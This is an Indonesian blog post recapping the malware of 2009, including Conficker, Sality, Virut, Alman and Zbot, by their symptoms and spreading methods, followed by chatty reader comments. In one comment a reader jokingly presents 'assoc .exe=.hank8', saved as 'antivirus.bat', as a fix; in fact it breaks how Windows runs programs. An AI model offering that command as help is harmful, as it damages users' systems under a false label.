Home » Security » Kilas balik, sejumlah virus yang bikin repot sepanjang 2009

Kilas balik, sejumlah virus yang bikin repot sepanjang 2009

25 Des. 2009115 comments
Kilas balik, sejumlah virus yang bikin repot sepanjang 2009

virus yang bikin repot sepanjang 2009Untuk melengkapi postingan sebelumnya tentang Ancaman internet yang siap menerjang di Tahun 2010, yuk … sejenak kita kilas balik untuk melihat jenis-jenis virus apa saja yang sempat bikin heboh dan bikin repot sepanjang tahun 2009 ini. Seperti yang pernah saya alami,  komputer saya pernah kena virus Conficker dan bikin repot. Kalau “Virus”nya Slank sich enak dinikmati.

Sepanjang tahun 2009 ini, dunia maya tak henti-hentinya dijejali gelontoran program jahat (malware). Ada yang ganas, namun ada pula yang cuma sekadar numpang lewat. Sang pembuat virus sendiri memiliki cara unik untuk mengelabui korban. Nama yang digunakan tentu yang memancing rasa penasaran. Misal ‘Sandra Dewi‘, siapa yang tak tertarik dan tergelitik jika dikirimi email dengan bertuliskan ‘Sandra Dewi Bugil‘?. Padahal sebenarnya, itu tak lebih dari sekadar alat pancingan agar calon korban memakan umpan si pembuat virus. Selanjutnya, tentu saja bukan kepuasan birahi yang didapat malah gelontoran program jahat yang menjajah komputernya.

Itu baru satu virus, masih banyak sejatinya cara-cara licik yang dijalankan penjahat cyber untuk menjerumuskan pengguna internet. Berikut ini adalah sejumlah virus sepanjang 2009 yang sempat bikin heboh dan repot namun patut diwaspadai.

1. Januari 2009 – Conficker

Program jahat ini mulai menyerang pada bulan Januari 2009. Apa saja ciri-ciri komputer yang terserang conficker?

  • Username Login di Active Directory (AD) Windows terkunci berulang-ulang. Jadi meskipun sudah terkunci (lock) Dan dibuka oleh Admin, tetapi terkunci lagi.
  • Dictionary Brute force
  • Komputer mendapatkan pesan error Generic Host Process. Komputer tidak bisa mengakses domain tertentu seperti IPnya bisa.
  • Patch komputer adalah korbannya.
  • Membuat http server port 1024 s/d 10.000

2. Februari 2009 – Shortcut

Program jahat ini mulai menyerang pada bulan Februari 2009. Virus ini sendiri ditemukan secara tak sengaja oleh analis virus Vaksincom. Ia mendapatkannya ketika sedang singgah di tempat kerja sahabatnya yang mengeluh karena dijejali shortcut di komputernya.

Norman Security Suite mendeteksi virus shortcut tersebut sebagai Worm:PIF/Starter. Ciri-ciri virus tersebut antara lain:

  1. Di folder My Documents terdapat sebuah file yang bernama database.mdb, Dan ternyata ini adalah file induknya.
  2. File Autorun.inf, Thumb.db, Microsoft.lnk di setiap driver, folder Dan flash disk sampai pada SUB Folder yang ke-2.
  3. Membuat File Duplikat setiap folder dengan extensi .lnk, maksimal 5 nama folder pertama, misalnya kalau di C:\Windows Ada banyak maka hanya akan diambil 5 nama pertama saja. Dan berlaku sampai sub folder yang ke-2.
  4. Mematikan fungsi dari file Registry.
  5. Menambahkan value di registry.

3. Maret 2009 – Sality

DI bulan Maret 2009, Virus Sality akan menyebar dengan cepat melalui jaringan dengan memanfaatkan default share Windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr

Berikut adalah ciri-ciri virus Sality:

  • Blok Antivirus Dan software security
  • Blok akses ‘safe mode’
  • Membuat file .DLL Dan .sys
  • Menginjeksi file exe, com, scr
  • Sangat sulit dibersihkan, salah-salah malah file jadi tidak bisa jalan
  • Mampu mengupdate dirinya, mendownload virus / Trojan lain
  • Eksploitasi full sharing Dan default share

4. Juni 2009 – Sandra Dewi, Cinta Ditolak Virus Bertindak

Ciri-ciri dari file virus ini, di antaranya sebagai berikut :

  • Memiliki ukuran file sebesar 132 kb.
  • Mempunyai type file ‘Application’.
  • Berextension file ‘exe’.
  • Memiliki icon gambar (JPEG image).

Virus Sandra Dewi dibuat dengan menggunakan bahasa pemrograman visual basic. Jika virus berhasil menginfeksi, maka IA akan membuat beberapa file virus di antaranya:

  • C:\Sandra Dewi Bugil.exe (pada semua root drive)
  • C:\Documents and Settings\%user%\Start Menu\Programs\Startup\Sandra Dewi Bugil.exe
  • C:\WINDOWS\Sandra Dewi Bugil.exe
  • C:\WINDOWS\system32\ Sandra Dewi Bugil.exe
  • Membuat duplikat file virus pada setiap folder yang Ada pada removable drive/USB

5. Agustus 2009 – Fullhouse

Satu lagi virus yang mengancam pengguna komputer adalah virus FullHouse. Ciri khas virus ini adalah membuat satu drive tambahan dengan nama FullHouse Drive.

Virus ini dibuat menggunakan bahasa pemrograman Visual Basic yang dalam melakukan aksinya akan membuat drive tersendiri pada Desktop, My computer dan Control Panel yang jika dibuka akan menampilkan gambar ‘Han Ji Eun’ artis cantik dalam serial Full House.

6. September 2009 – Virut Si Biang Spam

Kalau Anda ingin tahu virus apa yang paling memusingkan vendor antivirus di tahun 2009 ini, jawabannya bukan Conficker atau Alman. Virut adalah biangnya.

Pasalnya, aksi-aksi Virut bahkan bisa membuat jantung para administrator copot karena aksi brutalnya seperti

  • Mendisable Windows File Protection untuk menginfeksi seluruh file sistem OS Windows.
  • Menyebarkan dirinya melalui halaman web. HTML, ASP, PHP.
  • Menginfeksi Host file Windows, sehingga ia memiliki kontrol penuh terhadap koneksi internet komputer yang di infeksinya.
  • Melakukan kontak remote ke IRC server.
  • Menjadikan komputer korbannya server zombie untuk mendownload update virus dan perintah lain seperti mendownload master email spam dan menyebarkan ke alamat-alamat yang telah ditentukan.
  • Mendownload virus dan spyware lain untuk di infeksikan ke komputer.
  • Menjadikan komputer korbannya sebagai server spam dengan memanfaatkan IP publik yang dimiliki router komputer sehingga mengakibatkan IP tersebut di-banned dan di-blacklist.
  • Mematikan Firewall.
  • Disable share folder supaya sulit dibersihkan secara remote.
  • Inject network driver sehingga jika hostnya dibersihkan akan menyebabkan kelumpuhan akses komputer ke jaringan.

7. Oktober 2009 – Alman

Kalau Mbah Surip bilang I Love You Full, maka virus Alman juga akan bilang I Love You Full, khususnya bagi Anda yang melakukan sharing folder di jaringan secara Full Access (alias tanpa password).

Virus jawara di Indonesia ini (nomor 2 paling banyak menyebar menurut statistik malware Vaksincom Agustus 2009) mengincar semua folder di jaringan yang dishare secara full tanpa password.

Virus ini menyebar cukup cepat dengan memanfaatkan media Flash Disk atau Disket serta menyebar melalui jaringan. Untuk menyebar memalui Flash Disk/Disket, ia akan membuat 2 buah file yakni boot.exe dan autorun.inf. Selanjutnya virus ini akan aktif secara otomatis setiap kali Flash Disk tersebut dihubungkan ke komputer atau pada saat user akses ke Flash Disk tersebut.

Berikut ini adalah ciri-ciri Alman:

  • Aktif di memori sebagai services
  • Mengjeksi file .dll
  • Mencoba bruteforce simple pada share folder
  • Mendownload malware lain

8. Oktober 2009 – Penyerang Game Online

Virus ini berfungsi sebagai trojan dan keylogger. Dan kabar buruknya, selain mencuri data World of Warcraft, virus yang disebarkan juga memiliki aksi mencuri data account Yahoo dan Google.

Menurut pantauan Vaksincom baik dari data infeksi di komputer client dan traffic ISP yang di hentikan oleh NNP (Norman Network Protector), virus dengan nama W32/OnlineGames ini selalu menempati peringkat tinggi dalam penyebaran virus di Indonesia

9. November 2009 – Zbot, Virus Eksploitasi Facebook

Pengguna Facebook kerap jadi sasaran bagi pelaku kejahatan di dunia maya. Salah satunya, Facebooker sebaiknya jangan percaya jika ada iming-iming update dari Facebook.

Email program jahat tersebut mengiming-imingi pengguna Facebook akan hadirnya Facebook baru yang lebih baik. Berbagai fitur dan sistem login baru konon akan dimunculkan dalam Facebook baru tersebut.

Nah, untuk mendapatkannya pengguna diminta mengunjungi sebuah halaman web dan mengunduh sebuah program bernama updatetool.exe. Padahal program itu merupakan sebuah program jahat bernama Zbot yang akan membuat komputer korbannya menjadi pengirim spam. Di halaman Facebook palsu tersebut pelaku kejahatan juga akan merekam email dan password yang dimasukkan.

Sekali lagi tetap ingat pesannya Bang Napi : Waspadalah …! Waspadalah …! Jangan sampai anda jadi korbannya.

Mudah-mudahan artikel tentang Kilas balik, sejumlah virus yang bikin repot sepanjang 2009 ini bisa bermanfaat untuk anda, terima kasih.

Artikel Yang Mungkin Berkaitan :

  1. Nokia Security Code Resetter
  2. Awas! Hati-hati Dengan Virus Luna Maya
  3. Nokia Security Code/Unlocker/Memory Card/Antivirus
  4. Cara Aman Bermain Game Online
  5. Demi Keamanan Update Firefox 3.6 ke 3.6.2
  6. Cara mengatasi serangan malware pada website atau blog
  7. IE Cacat, Pengguna Opera & Firefox Melonjak
  8. Cara Membasmi Virus Ramnit dari Komputer
  9. Download Avast Terbaru 2012, Avast Free Antivirus 7.0.1407
  10. Free Download Anti Virus Untuk Windows 7
  1. 25-12-2009 at 19:04 | #1

    PERTAMAXX kah?

    Reply

    Dangstars Reply:

    Ikutan

    Reply

    cah ndeso Reply:

    wee Kang, tungguin…mosok aku ditinggal to? Tega nian dikau padaku :(

    Reply

    Dangstars Reply:

    lagi

    Reply

    Dangstars Reply:

    Sudah rame nih

    Reply

    cah ndeso Reply:

    rame Kang. Kan mo Taun Baru . skalian jualan trompet nih. TREEETTT TET TEEEETT … TROOOOOOOT TTOOT TTOOOTTT

    Reply

    Dangstars Reply:

    Selamat hari Libur

    Reply

    Dangstars Reply:

    Selamaaaaaat

    Reply

    cah ndeso Reply:

    Selamat dah ;)

    Dangstars Reply:

    ikutttt aja

    Reply

    Dangstars Reply:

    sekali lagi ikutttt

    Reply

    cah ndeso Reply:

    ndusel ke pertamaaxxss aahh :lol:

    Reply

    Hanif Ilham M Reply:

    banyaknya virusnya,,, ikut dong pertamax… hehe…

    Reply

  2. 25-12-2009 at 19:15 | #2

    weh dapet ilmu baru nih. Trims banget. Ini semua musnah gak ya pakel antivirus lokal kayak PCMAV gituh ?

    Reply

    Alwi Reply:

    Untuk Conficker gak mempan Kang bisanya pakai Norman_Malware_Cleaner atau tool removal free dari symantec

    Reply

    Dangstars Reply:

    Hatur nuhun

    Reply

    cah ndeso Reply:

    Mangga Kang Dadang ;)

    Dangstars Reply:

    pisan terimakasih Om Alwi

    Reply

    Dangstars Reply:

    terimakasih banyak vbolak-balik dong

    cah ndeso Reply:

    Kalo konfliker biasane paling ampuh adalah pakai CD Windows Om :lol:

    yang artinya Instal Ulang. hhehehehe…

    Reply

    Alwi Reply:

    @cah ndeso : itu jurus pamungkas ….. heeee…

    arkasala Reply:

    Duh banyak tantangannya.
    Mas, satu-satu dipelajari ternyata punya urutan 61 yang harus dipelajari he he he ….. itu semua dampak ngeblog…. mantaaaaappppssss

    Reply

  3. 25-12-2009 at 19:17 | #3

    amankan ketigax dulu

    Reply

    Dangstars Reply:

    Amann Gan

    Reply

    cah ndeso Reply:

    seepp….tetep terkendali Kang. CUman sayang nih, banyak nyamuk di warnet nih. Jadi kaki musti nahan serangan nyamuk. :oops:

    Wadaawww…. tuhh kaan

    Reply

    RifkyMedia™ Reply:

    perlu di fogging tuh bro warnet nya hehehehe

    Dangstars Reply:

    pasti aman

    Reply

    Dangstars Reply:

    kalo dah aman pasti hebat

    Reply

    cah ndeso Reply:

    top bgt dan top markotop dah

    Reply

    Dangstars Reply:

    pasti

    Reply

    cah ndeso Reply:

    ngikuutttt :roll:

    Reply

    cah ndeso Reply:

    ndusel2 yang ketiaaxxxss dah :lol:

    Reply

  4. 25-12-2009 at 19:20 | #4

    wah tahun depan virus model apa lagi nih? slm ini sih saya pake Smadav heheh..i love u full

    Reply

    Alwi Reply:

    Smadav juga oke tapi dlm kondisi tertentu perlu jg antivirus yg lain

    Reply

    Dangstars Reply:

    Betul setuju Om

    Reply

    cah ndeso Reply:

    setuju banget Om.
    Warnet tem4 kerja, user pakai Kaspersky Internet Security semua. TOP BGT Om :cool:

    cah ndeso Reply:

    Smadav digabung sama Kaspersky. weh mangstap dah :lol:

    Reply

    RifkyMedia™ Reply:

    ow gitu ya bro..kalau kaspers berat banget bro,di pc saya, maklum pc jaman nipon hehehehe kombinasi killer tuh

    Reply

  5. 25-12-2009 at 19:49 | #5

    wah bisa KLIMAXX disini…

    semoga tahun depan saia bisa bikin virus, g cuma kena virus terus .

    Reply

    Alwi Reply:

    Monggo silahkan Klimax sepuasnya gratis kok heeee…..
    iya yaaaa… kalu bisa bikin virus kaannn jadi tau cara membasminya …

    Reply

    Dangstars Reply:

    Sudah kelimaxx siap=-siap dong

    Reply

    cah ndeso Reply:

    siapin? weeehh…..hayoooo :cool:

    Dangstars Reply:

    Siap apaan

    Reply

    Dangstars Reply:

    Siapp tidur

    Reply

    Dangstars Reply:

    Duh ngantukkk

    cah ndeso Reply:

    dah malah Kang Dadang ini :)

    Dangstars Reply:

    hadiiir lagiii om

    Dangstars Reply:

    Kunkjungan malamm

    cah ndeso Reply:

    Itulah susahnya. Bisa bikin virus tapi ndak bisa bikin antivirusnya. duh duuuhhhh :lol:

    Coba dah Mas pakai cara ini :
    – Buka Notepad
    – ketik assoc .exe=.hank8
    – Simpan dengan nama antivirus.bat
    – Habis itu dieksekusi.

    ;) dijamin dah

    Reply

    RifkyMedia™ Reply:

    tak coba dulu kang

    cah ndeso Reply:

    dah minum jamunya Mas? :mrgreen:

    Reply

    RifkyMedia™ Reply:

    jamu sari rapet kang huauauaua

    Reply

  6. 25-12-2009 at 20:53 | #6

    Om gimana kabarnya

    Reply

    Dangstars Reply:

    Sehat pastinya ia kan?

    Reply

    cah ndeso Reply:

    alhamdulillah Kang Dadang .

    Reply

    Dangstars Reply:

    dah pastiiii

    Reply

    cah ndeso Reply:

    tentu laahhh :mrgreen:

    Reply

    cah ndeso Reply:

    baeekkkk ;)

    Reply

    Pecinta Kuliner Reply:

    Kabar abdi mah sae Kang Dadang..

    Reply

  7. 25-12-2009 at 21:07 | #7

    iih… tatuuut… banyak banget virus yax.. ??
    Kalo virus cinta ada gak mas?? hehehe .

    Reply

    Pecinta Kuliner Reply:

    Wadaouw… aku ketinggalan jauuh buangetszz yak..
    Mungkinkah dapet buku dari mas alwi??
    oh tuhan… tolong lah hamba mu ini….

    Reply

    cah ndeso Reply:

    tenang Mbak. Masih ada kesempatan kok :mrgreen:

    Reply

    Alwi Reply:

    Jangan menyerah heeee ….

    Pecinta Kuliner Reply:

    aku pengen dapet buku gratis dari mas alwi… Help Me God..

    Reply

    cah ndeso Reply:

    dicoba nyepam aja Mbak. wkwwkkwkwkkkk…. dijamin dah langsung ngaciiiirrr posisinya :cool:

    Reply

    Pecinta kuliner Reply:

    wualah… boro-boro nyepam, mas adi…
    bebenah blog sendiri aja masih diajar kok.. .

    cah ndeso Reply:

    ada banyak Mbak kalo pengen dapet virus cinta :lol:

    Reply

    Pecinta kuliner Reply:

    bisa didapet dimana tuh mas??

    Reply

    Alwi Reply:

    Masih seminggu kok Mbak Ira kebut terus …. sambil goyang …

    Reply

    cah ndeso Reply:

    doohh…. isa ikut goyang ndak yah?. Soale klo ikut goyang, pasti ditendang sama AKI2 :(

    Reply

    Alwi Reply:

    Saya iringin pake musik aja yaaaa ….

    Pecinta kuliner Reply:

    goyang dombreet.. goyang dombret..

    cah ndeso Reply:

    tuuhh kaan. hahhahahhaha :lol:

    Reply

    Saung Web Reply:

    ikutan nimbrung doong

    Pecinta kuliner Reply:

    oke lah kalo beghithoo.. http://emoticons4u.com/music/musik36.gif

    Reply

  8. 25-12-2009 at 21:28 | #8

    Hwaduh virus kok rombongan gitu, bisa beranak pinak lagi. Pengalaman PCku pernah kena virut sama Mbak Sality. Langsung di eksekusi PCnya alias install ulang…..!

    Reply

    cah ndeso Reply:

    resep jitu dan terampuh :cool:

    Reply

    RifkyMedia™ Reply:

    dulu pernah tuh pc saya cacingan semua bro(worm):( pas lagi ngerjain Skripsi :(

    Reply

  9. 25-12-2009 at 22:37 | #9

    Nyalam dulu eh buat mas Alwi .. makasih atas kunjungannya.. coba gak ada virus di dunia ini ya.. aman kali

    Reply

    Alwi Reply:

    Ntar perusahaan antivirus jadi gak laku boss …

    Reply

    RifkyMedia™ Reply:

    wah bener…simbiosis mutualisme!

    Reply

  10. 25-12-2009 at 22:59 | #10

    Wah, isinya teori semua…

    Reply

    Alwi Reply:

    Nanti kita saling share Pak, tiap virus kadang beda2 cara ngatasinya, saya pernah kena Conficker duh repot banget basminya gak kaya yg lain. Jadi harus diskonek dl, disble system restore, lacak services, delete service svchost.exe replica, Schedule Task, yg paling repot harus lacak registry dl duhhhh ….. sempat bikin puyeng ……

    Reply

Comment pages
5+8=? (Wajib diisi)